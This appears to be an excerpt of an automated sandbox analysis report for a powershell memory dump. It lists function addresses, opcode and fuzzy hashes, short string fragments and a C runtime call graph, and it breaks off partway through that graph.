                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 69709c7e0e18ea007e7bdce5c914e7aa4a1f240caa2eb7a4404a333adb0e0f95
                                                                    • Instruction ID: 763e79fefe7037ed65445137f06a8f5827aaa1ddb1746b6a06f1f2d6369f4216
                                                                    • Opcode Fuzzy Hash: 69709c7e0e18ea007e7bdce5c914e7aa4a1f240caa2eb7a4404a333adb0e0f95
                                                                    • Instruction Fuzzy Hash: 02318F74B402049BDB48A7A8C995BAE7EA7EFC4744F108424E9016F3D1CE7A9C42CBE1
                                                                    Function 07100EF8 Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3dec18ec76ad7d28f12585297e6d3acdac20270565813484d3b4c34b1edf1877
                                                                    • Instruction ID: e7fa593d4ab7d873eaf05823763a4073b323cae77951f5661f3826c74ad9ffeb
                                                                    • Opcode Fuzzy Hash: 3dec18ec76ad7d28f12585297e6d3acdac20270565813484d3b4c34b1edf1877
                                                                    • Instruction Fuzzy Hash: A2214C71310316AFD7285ABA888073BB6D69BC9712F20843AA546CB2C0CFB5DC41D3B1
                                                                    Function 07100EE3 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c1b0f32427bae99bf694629a71e40eb9e834019804bf648b5f61ebff5ad431c
                                                                    • Instruction ID: cbedb3474855201075d03fc4794ff711e36ae66562a3619c5126f0850b617c49
                                                                    • Opcode Fuzzy Hash: 1c1b0f32427bae99bf694629a71e40eb9e834019804bf648b5f61ebff5ad431c
                                                                    • Instruction Fuzzy Hash: 9121AD703043867FD7290A7A88807767FA69F8A711F248466E585CB2D2CBB9DD44D3B1
                                                                    Function 07100C08 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 45db5492ee13097cf1aab68be6b9837437878e8d7407b4a3cda97bcf4fa7142c
                                                                    • Instruction ID: 7c46a5545352a1f2cdb76ecde9e092d723e1cf3745d0619431788f5f829100f5
                                                                    • Opcode Fuzzy Hash: 45db5492ee13097cf1aab68be6b9837437878e8d7407b4a3cda97bcf4fa7142c
                                                                    • Instruction Fuzzy Hash: BB01477632031A8BC72555AAD50027AB799DBC9622F14C47EE849C62D0DBB2C945C3A0
                                                                    Function 0710A989 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f22687ba7ca6f2a03ef34aa79c629740938a4acae9c8c130dbbfa2b91bc8e8dc
                                                                    • Instruction ID: f136a7c23d017271c430452e60fc2db3a77e506d32107c37dc91185625d0d535
                                                                    • Opcode Fuzzy Hash: f22687ba7ca6f2a03ef34aa79c629740938a4acae9c8c130dbbfa2b91bc8e8dc
                                                                    • Instruction Fuzzy Hash: 28012BB1B046144BD22712780D125AD3B128FD9759B4144BAC901AF2C6CBB94D0383E3
                                                                    Function 00B4D01D Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2360779545.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_b4d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e4029322e6e41dc85a15ae6cb0a35238408b7b2e368f161f609fa0d52ffb01d8
                                                                    • Instruction ID: 20c83c556f621401b0f9b5dfe71f6047556ca964aa09106e4ab0895acd43de75
                                                                    • Opcode Fuzzy Hash: e4029322e6e41dc85a15ae6cb0a35238408b7b2e368f161f609fa0d52ffb01d8
                                                                    • Instruction Fuzzy Hash: BA012B311043009ADB208B19CDC4B67BFDCEF45324F18C4AAED480B346C2799942D6B1
                                                                    Function 07100C84 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18086e4892594856e7c13644352b85d82c995fe54ee6ad61eeb9895889e81021
                                                                    • Instruction ID: ba58d192e7440bc222bfddfb2c71084a6efecc4787f7625b3c8c6cf401aca4b0
                                                                    • Opcode Fuzzy Hash: 18086e4892594856e7c13644352b85d82c995fe54ee6ad61eeb9895889e81021
                                                                    • Instruction Fuzzy Hash: 98F078322283808FC3028A689900371BBB5CFCB122F1940FBD044C71E2D3A28D07C7B1
                                                                    Function 00B4D01C Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2360779545.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_b4d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b66127aa31aa6ac2414318061f8628a4919ef1c4bd8131736b8652e10594fa96
                                                                    • Instruction ID: 6ccd56abf37deef3be362fdc48fd3d6c46b415cabf91171807ec14eb1e91ba89
                                                                    • Opcode Fuzzy Hash: b66127aa31aa6ac2414318061f8628a4919ef1c4bd8131736b8652e10594fa96
                                                                    • Instruction Fuzzy Hash: FAF0C271004344AEEB108A16C984B62FFD8EF52334F18C45AED480B386C2799841CAB0
                                                                    Function 071033A4 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4987730b95dec03cebca21f99c8c8476d20d0cb2b41389e16b12ad208d184cd0
                                                                    • Instruction ID: 7f4af948b8d1325bc0a162cdd9c91915e1a5d8dc401a17e1b5d52b5fbfac3dad
                                                                    • Opcode Fuzzy Hash: 4987730b95dec03cebca21f99c8c8476d20d0cb2b41389e16b12ad208d184cd0
                                                                    • Instruction Fuzzy Hash: 8AF0397020A241EFD312CB20D895A56BB72AF83204B09C1CFD0548F1E7CBB6D842CBA1

                                                                    Non-executed Functions

                                                                    Function 00B4D6F8 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2360779545.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_b4d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e65cd4feed42e44697013ea2ef8c0be318f5e1ca30ed618e0ee6cd4f1a14e70a
                                                                    • Instruction ID: a5fed7af5210aa150f94a6274f84a016c14078fa51deee17d354c11e628bfe36
                                                                    • Opcode Fuzzy Hash: e65cd4feed42e44697013ea2ef8c0be318f5e1ca30ed618e0ee6cd4f1a14e70a
                                                                    • Instruction Fuzzy Hash: 5D213772604204DFDF05DF14D9C0F26BFA5FB98324F2485A9E9090B256C33ADD56EBA2
                                                                    Function 071026D0 Relevance: 12.8, Strings: 10, Instructions: 303COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-267665775
                                                                    • Opcode ID: f1098f474f6d6a0fe177421711624c6d95a201d322cc5b2afaf884b10ea98f66
                                                                    • Instruction ID: b6fb44a8fdec792d1ccd51a834d0e3f82ceca59950fae7b6dd2f79b4840fff78
                                                                    • Opcode Fuzzy Hash: f1098f474f6d6a0fe177421711624c6d95a201d322cc5b2afaf884b10ea98f66
                                                                    • Instruction Fuzzy Hash: 9FA189B1704316CFCB2A5A39985876ABBE5BF82210F2484BBD845CB2D1DBB5C841C3E1
                                                                    Function 0710D1A5 Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                                    • API String ID: 0-3118609902
                                                                    • Opcode ID: 7235d6b03d053c0d87d5c02c3bb6c6761dc8b9761597bc1286788ce2f403dccb
                                                                    • Instruction ID: 61834b2a8cc6ce85c2fbb28c2658663091d75e805e62db76feda7787284ba2c5
                                                                    • Opcode Fuzzy Hash: 7235d6b03d053c0d87d5c02c3bb6c6761dc8b9761597bc1286788ce2f403dccb
                                                                    • Instruction Fuzzy Hash: 6A7117B1700216CFCB298FA9E450A7ABBE6EF85710F148499E881DF6D0CB75D841C7E2
                                                                    Function 07108AD9 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-1910532044
                                                                    • Opcode ID: d3ed9cfe79047a01530349b3a0b3adf665489bfdaa72d8b47ddc977665ab38fa
                                                                    • Instruction ID: 8a4952e91fb9e47dcc4a85f8c03bbd668c083867861a5fc110dc280796e83db7
                                                                    • Opcode Fuzzy Hash: d3ed9cfe79047a01530349b3a0b3adf665489bfdaa72d8b47ddc977665ab38fa
                                                                    • Instruction Fuzzy Hash: 5D5135B0B183059FCB2A9F6885506AABBB6AF85310F14C46AD8029F3D0CBB5C941CBD1
                                                                    Function 0710D9F8 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                                                                    • API String ID: 0-537408273
                                                                    • Opcode ID: 222d948fbc6493119adfb8969ad06c5aa5f88c1be4c4d8c3f37384fc72268c23
                                                                    • Instruction ID: 8ff0dffba7c1508125744fce12d0e01edcdcab996bee34b95e11461b377b1a07
                                                                    • Opcode Fuzzy Hash: 222d948fbc6493119adfb8969ad06c5aa5f88c1be4c4d8c3f37384fc72268c23
                                                                    • Instruction Fuzzy Hash: 8861C5B0710205DFCB29CE88D645BAABBF2AF85710F198459E8855B3D0CBB5DD81CBE1
                                                                    Function 0710D694 Relevance: 8.9, Strings: 7, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2778409501
                                                                    • Opcode ID: f452f1f04ef620e2afa90d3ae80885ab2c66d3366c4d8f292fb778f0b5aa07d4
                                                                    • Instruction ID: 9bb0daebdc192450c8355bd29d123f3b06a217740cbe80a0ee93441a2d49598f
                                                                    • Opcode Fuzzy Hash: f452f1f04ef620e2afa90d3ae80885ab2c66d3366c4d8f292fb778f0b5aa07d4
                                                                    • Instruction Fuzzy Hash: 185105B1B00206DFCB2A8E94E5497A677B2BF41315F5980ABE8849B2D5C7F1DC80CBD1
                                                                    Function 0710D6A8 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2778409501
                                                                    • Opcode ID: 0ceb90eb6a807e1288626568cbe3224d6b0194209abc69c7485dc1fec0ea7960
                                                                    • Instruction ID: 7f50bac725ba6735aa7777d7f5653d4cd572d2431ff129d1fed48a23723ff46c
                                                                    • Opcode Fuzzy Hash: 0ceb90eb6a807e1288626568cbe3224d6b0194209abc69c7485dc1fec0ea7960
                                                                    • Instruction Fuzzy Hash: 6F51E6B0700206DFCB2A8E94E5497A673B2BF45315F558466E8849B2D4C7F1DC80CBD1
                                                                    Function 07102060 Relevance: 7.6, Strings: 6, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$t~pq$$]q$$]q$$]q
                                                                    • API String ID: 0-1469378889
                                                                    • Opcode ID: e8aba89dc1b5474060d0051285ed2435337de6968d890ae7429165b603977304
                                                                    • Instruction ID: 3d99734ed305aba9085503f1996ca732fdac53aec803b5b0f0ee871949d64010
                                                                    • Opcode Fuzzy Hash: e8aba89dc1b5474060d0051285ed2435337de6968d890ae7429165b603977304
                                                                    • Instruction Fuzzy Hash: E7418DB17003068FD73A1A698C5427ABBD6BFC5311F24886AD9418B2D5DFB5C842C3E2
                                                                    Function 07108D68 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: e6714ef7dd10981ce09bb9caa0ffbba03cc3a842923cb91d2e51b9ab0103361f
                                                                    • Instruction ID: d4c5bb5a1484430ec4f84da4bfc64d2b1723b6167af5e4cb9c2a4664b182ba7a
                                                                    • Opcode Fuzzy Hash: e6714ef7dd10981ce09bb9caa0ffbba03cc3a842923cb91d2e51b9ab0103361f
                                                                    • Instruction Fuzzy Hash: 8B314BB670C3078FDB3E5A699850166F7E1AFD1610B28897BC8819B2C6DFB9C415C3D2
                                                                    Function 071044F5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-2353078639
                                                                    • Opcode ID: 985e06df8fa0500307d4ca19358bce6a46639e2c90d2a6fbff7aefa6f2672e10
                                                                    • Instruction ID: 86f60c53b44a9aeeae6899c472ec9c58156133ac9e9a0918c96eeff3ba3ec913
                                                                    • Opcode Fuzzy Hash: 985e06df8fa0500307d4ca19358bce6a46639e2c90d2a6fbff7aefa6f2672e10
                                                                    • Instruction Fuzzy Hash: D63148F6700296CFCB2A4A6894D01B6B7F1EFC3211B29846ADE41872D4DF75C441C7D2
                                                                    Function 0710D2A6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                    • API String ID: 0-1723543176
                                                                    • Opcode ID: d18f56488f50fcd575ddfbb29c095e42561121763e4dbc06a6ce03b8ec30a494
                                                                    • Instruction ID: e041ff82541569c29f4c85ee03417d9c89e7226b27c62e9d156a39dc5c7b98d2
                                                                    • Opcode Fuzzy Hash: d18f56488f50fcd575ddfbb29c095e42561121763e4dbc06a6ce03b8ec30a494
                                                                    • Instruction Fuzzy Hash: DC3161B4B002159FCB28CF98E484A6AFBB6BB88710F158595E845AF7D0C7B1DC41CBE1
                                                                    Function 07101150 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: cb22b57e77cb70dd1cba200f4baf6d30a9d836a5487a317bcdb1977d65542931
                                                                    • Instruction ID: 3cb147825e1bf8370c513defc186111de43e167665a43715ea42df2082346970
                                                                    • Opcode Fuzzy Hash: cb22b57e77cb70dd1cba200f4baf6d30a9d836a5487a317bcdb1977d65542931
                                                                    • Instruction Fuzzy Hash: 0521497131030ABBDB2D45BA8850B2BB6DAABD1715F20842AA805C73C1CEB9C841D3A1
                                                                    Function 07101E48 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q
                                                                    • API String ID: 0-978391646
                                                                    • Opcode ID: dc36b95f1d1dd0ee945fe1fa115834318a7e7f78a8498db2486887221e2abd7d
                                                                    • Instruction ID: 06543291d2e3154634c072d7d1c9534a3d4a2924cc35a30b83bc5ab3b0f399bb
                                                                    • Opcode Fuzzy Hash: dc36b95f1d1dd0ee945fe1fa115834318a7e7f78a8498db2486887221e2abd7d
                                                                    • Instruction Fuzzy Hash: 6A017C3170A3CA5FC33B0228182056DAFB69FC3A5032A04E7D481EB2D6CA5D4D0A83B6

                                                                    Execution Graph

                                                                    Execution Coverage:1.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:2.7%
                                                                    Total number of Nodes:1628
                                                                    Total number of Limit Nodes:1
                                                                    execution_graph 7448 234b2049 7450 234b2055 ___DestructExceptionObject 7448->7450 7449 234b205e 7450->7449 7451 234b207d 7450->7451 7452 234b20d3 7450->7452 7462 234b244c 7451->7462 7454 234b2639 ___scrt_fastfail 4 API calls 7452->7454 7455 234b20da 7454->7455 7456 234b2082 7471 234b2308 7456->7471 7458 234b2087 __RTC_Initialize 7474 234b20c4 7458->7474 7460 234b209f 7477 234b260b 7460->7477 7463 234b2451 ___scrt_release_startup_lock 7462->7463 7464 234b2455 7463->7464 7467 234b2461 7463->7467 7483 234b527a 7464->7483 7468 234b246e 7467->7468 7486 234b499b 7467->7486 7468->7456 7561 234b34c7 RtlInterlockedFlushSList 7471->7561 7473 234b2312 7473->7458 7563 234b246f 7474->7563 7476 234b20c9 ___scrt_release_startup_lock 7476->7460 7478 234b2617 7477->7478 7479 234b262d 7478->7479 7571 234b53ed 7478->7571 7479->7449 7482 234b3529 ___vcrt_uninitialize 8 API calls 7482->7479 7508 234b5132 7483->7508 7487 234b49a7 _abort 7486->7487 7496 234b49bf 7487->7496 7530 234b4af5 GetModuleHandleW 7487->7530 7491 234b4a65 7540 234b4aa5 7491->7540 7495 234b4a3c 7497 234b4a54 7495->7497 7502 234b4669 _abort 5 API calls 7495->7502 7539 234b5671 RtlEnterCriticalSection 7496->7539 7503 234b4669 _abort 5 API calls 7497->7503 7498 234b49c7 7498->7491 7498->7495 7505 234b527a _abort 20 API calls 7498->7505 7499 234b4aae 7551 234bbdc9 7499->7551 7500 234b4a82 7543 234b4ab4 7500->7543 7502->7497 7503->7491 7505->7495 7511 234b50e1 7508->7511 7510 234b245f 7510->7456 7512 234b50ed ___DestructExceptionObject 7511->7512 7519 234b5671 RtlEnterCriticalSection 7512->7519 7514 234b50fb 7520 234b515a 7514->7520 7518 234b5119 _abort 7518->7510 7519->7514 7523 234b517a 7520->7523 7524 234b5182 7520->7524 7521 234b2ada _ValidateLocalCookies 5 API calls 7522 234b5108 7521->7522 7526 234b5126 7522->7526 7523->7521 7524->7523 7525 234b571e _free 20 API calls 7524->7525 7525->7523 7529 234b56b9 RtlLeaveCriticalSection 7526->7529 7528 234b5130 7528->7518 7529->7528 7531 234b49b3 7530->7531 7531->7496 7532 234b4b39 GetModuleHandleExW 7531->7532 7533 234b4b63 GetProcAddress 7532->7533 7534 234b4b78 7532->7534 7533->7534 7535 234b4b8c FreeLibrary 7534->7535 7536 234b4b95 7534->7536 7535->7536 7537 234b2ada _ValidateLocalCookies 5 API calls 7536->7537 7538 234b4b9f 7537->7538 7538->7496 7539->7498 7554 234b56b9 RtlLeaveCriticalSection 7540->7554 7542 234b4a7e 7542->7499 7542->7500 7555 234b6025 7543->7555 7546 234b4ae2 7549 234b4b39 _abort 8 API calls 7546->7549 7547 234b4ac2 GetPEB 7547->7546 7548 234b4ad2 GetCurrentProcess TerminateProcess 7547->7548 7548->7546 7550 234b4aea ExitProcess 7549->7550 7552 234b2ada _ValidateLocalCookies 5 API calls 7551->7552 7553 234bbdd4 7552->7553 7553->7553 7554->7542 7556 234b604a 7555->7556 7560 234b6040 7555->7560 7557 234b5c45 _abort 5 API calls 7556->7557 7557->7560 7558 234b2ada _ValidateLocalCookies 5 API calls 7559 234b4abe 7558->7559 7559->7546 7559->7547 7560->7558 7562 234b34d7 7561->7562 7562->7473 7568 234b53ff 7563->7568 7566 234b391b ___vcrt_uninitialize_ptd 6 API calls 7567 234b354d 7566->7567 7567->7476 7569 234b5c2b 11 API calls 7568->7569 7570 234b2476 7569->7570 7570->7566 7574 234b74da 7571->7574 7577 234b74f3 7574->7577 7575 234b2ada _ValidateLocalCookies 5 API calls 7576 234b2625 7575->7576 7576->7482 7577->7575 7897 234b8a89 7898 234b6d60 51 API calls 7897->7898 7899 234b8a8e 7898->7899 6169 234b5348 6172 234b3529 6169->6172 6173 234b3532 6172->6173 6179 234b3543 6172->6179 6180 234b391b 6173->6180 6181 234b3537 6180->6181 6182 234b3925 6180->6182 6184 234b3972 6181->6184 6192 234b3b2c 6182->6192 6185 234b353c 6184->6185 6186 234b397d 6184->6186 6188 234b3c50 6185->6188 6187 234b3987 RtlDeleteCriticalSection 6186->6187 6187->6185 6187->6187 6189 234b3c7f 6188->6189 6191 234b3c59 6188->6191 6189->6179 6190 234b3c69 FreeLibrary 6190->6191 6191->6189 6191->6190 6197 234b3a82 6192->6197 6194 234b3b46 6195 234b3b5e TlsFree 6194->6195 6196 234b3b52 6194->6196 6195->6196 6196->6181 6198 234b3aaa 6197->6198 6202 234b3aa6 __crt_fast_encode_pointer 6197->6202 6198->6202 6203 234b39be 6198->6203 6201 234b3ac4 GetProcAddress 6201->6202 6202->6194 6204 234b39cd try_get_first_available_module 6203->6204 6205 234b3a77 6204->6205 6206 234b39ea LoadLibraryExW 6204->6206 6208 234b3a60 FreeLibrary 6204->6208 6209 234b3a38 LoadLibraryExW 6204->6209 6205->6201 6205->6202 6206->6204 6207 234b3a05 GetLastError 6206->6207 6207->6204 6208->6204 6209->6204 6210 234b7b48 6220 234b8ebf 6210->6220 6214 234b7b55 6233 234b907c 6214->6233 6217 234b7b7f 6218 234b571e _free 20 API calls 6217->6218 6219 234b7b8a 6218->6219 6237 234b8ec8 6220->6237 6222 234b7b50 6223 234b8fdc 6222->6223 6224 234b8fe8 ___DestructExceptionObject 6223->6224 6257 234b5671 RtlEnterCriticalSection 6224->6257 6226 234b905e 6271 234b9073 6226->6271 6228 234b8ff3 6228->6226 6230 234b9032 RtlDeleteCriticalSection 6228->6230 6258 234ba09c 6228->6258 6229 234b906a _abort 6229->6214 6232 234b571e _free 20 API calls 6230->6232 6232->6228 6234 234b9092 6233->6234 6235 234b7b64 RtlDeleteCriticalSection 6233->6235 6234->6235 6236 234b571e _free 20 API calls 6234->6236 6235->6214 6235->6217 6236->6235 6238 234b8ed4 ___DestructExceptionObject 6237->6238 6247 234b5671 RtlEnterCriticalSection 6238->6247 6240 234b8f77 6252 234b8f97 6240->6252 6244 234b8ee3 6244->6240 6246 234b8e78 66 API calls 6244->6246 6248 234b7b94 RtlEnterCriticalSection 6244->6248 6249 234b8f6d 6244->6249 6245 234b8f83 _abort 6245->6222 6246->6244 6247->6244 6248->6244 6255 234b7ba8 RtlLeaveCriticalSection 6249->6255 6251 234b8f75 6251->6244 6256 234b56b9 RtlLeaveCriticalSection 6252->6256 6254 234b8f9e 6254->6245 6255->6251 6256->6254 6257->6228 6259 234ba0a8 ___DestructExceptionObject 6258->6259 6260 234ba0b9 6259->6260 6261 234ba0ce 6259->6261 6262 234b6368 _free 20 API calls 6260->6262 6270 234ba0c9 _abort 6261->6270 6277 234b7b94 RtlEnterCriticalSection 6261->6277 6263 234ba0be 6262->6263 6274 234b62ac 6263->6274 6265 234ba0ea 6278 234ba026 6265->6278 6268 234ba0f5 6294 234ba112 6268->6294 6270->6228 6643 234b56b9 RtlLeaveCriticalSection 6271->6643 6273 234b907a 6273->6229 6297 234b6231 6274->6297 6276 234b62b8 6276->6270 6277->6265 6279 234ba033 6278->6279 6281 234ba048 6278->6281 6280 234b6368 _free 20 API calls 6279->6280 6282 234ba038 6280->6282 6287 234ba043 6281->6287 6318 234b8e12 6281->6318 6284 234b62ac _abort 26 API calls 6282->6284 6284->6287 6286 234b907c 20 API calls 6288 234ba064 6286->6288 6287->6268 6324 234b7a5a 6288->6324 6290 234ba06a 6331 234badce 6290->6331 6293 234b571e _free 20 API calls 6293->6287 6642 